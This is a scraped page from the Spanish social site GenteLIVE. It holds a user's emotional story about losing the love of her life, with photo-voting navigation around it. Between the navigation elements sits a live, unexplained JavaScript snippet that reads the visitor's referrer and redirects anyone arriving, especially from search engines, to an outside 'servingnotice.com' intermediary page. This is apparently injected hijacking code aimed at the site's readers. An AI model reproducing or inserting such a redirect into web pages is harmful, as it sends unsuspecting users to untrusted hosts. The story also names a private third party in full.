Foto cuarto   Foto segundo   1º de la semana   1ª de la semana   Foto segunda   Foto Cuarta
  Foto quinto   Foto tercero Foto tercera   Foto quinta
 
Recuerda: puedes votar hasta el viernes a las 24:00
         
Votaciones de esta semana
       
130.471
  • ChicoLive
  • ChicaLive
var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/lvinter1/intermediary.html?it11org"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl;
Cursos, Masters y Oposiciones
Las mejores inocentadas para el 28 de diciembre
 

ELLA-SIEMPRE

ELLA-SIEMPRE  
33
Murcia  
   

Historia

9 años sin ti..
[28-11-2013 16:58]

Fue en 2004 cuando perdí al amor de mi vida, Pedro Munuera Ruiz. Ayer recibí una llamada de un numero desconocido y parecía su voz, cosa que me desorientó y no me dejó pensar..

Hace 8 años escribí esta historia con otro nombre..
http://www.gentelive.com/show.php?tipo=historias&p=leeh&id=240634

Quizás leyéndola podreis entenderme mejor...

Hace 11 meses vi una foto en facebook que me rompio el alma en dos, estuve llorando 3 días y acostada en la cama sin querer salir de allí, cuando me recompuse, a la vez me dio mucha alegría.. por el, la foto creo que era de su hija, la niña de sus ojos, fruto del amor con su pareja que imagino será la mujer de su vida.. "El amor de mi vida con el amor de su vida" suena duro..

La vida es más triste sin ti, dicen que el amor es para siempre y yo soy la viva imagen de ese refran.. Me acuerdo del banco del autobus, de la estación de tren y cuando me acerco a esos lugares apareces para mi, un recuerdo inolvidable

No salgo de esta pena de recordar lo que tenía y que podría haber sido y nunca será y ayer esa llamada me dio luz pero nunca serás tú..

Te deseo lo mejor... Si algún día lees esto.. búscame porque por mucho que me pese estaré para tí por siempre... ayer imagine que al final me buscabas pero mi estrella se apagó hace mucho tiempo.. mucho..

ISA o ELLA-, ELLA-SIEMPRE......



Compártelo:

 
Haz GenteLIVE tu página de inicio Añadir a Favoritos Contacto Ayuda